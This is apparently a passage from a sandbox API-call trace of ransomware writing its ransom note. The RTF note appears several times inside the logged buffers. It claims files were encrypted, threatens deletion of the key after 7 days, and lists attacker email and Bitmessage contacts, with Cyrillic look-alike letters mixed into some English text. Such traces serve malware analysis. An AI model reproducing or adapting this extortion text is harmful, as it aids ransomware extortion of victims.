r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.107] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.113] CloseHandle (hObject=0x2e8) returned 1 [0292.113] GetFileAttributesW 